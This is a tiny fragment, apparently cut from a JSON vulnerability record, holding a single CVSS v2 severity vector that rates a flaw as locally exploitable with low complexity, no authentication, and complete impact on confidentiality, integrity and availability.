"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}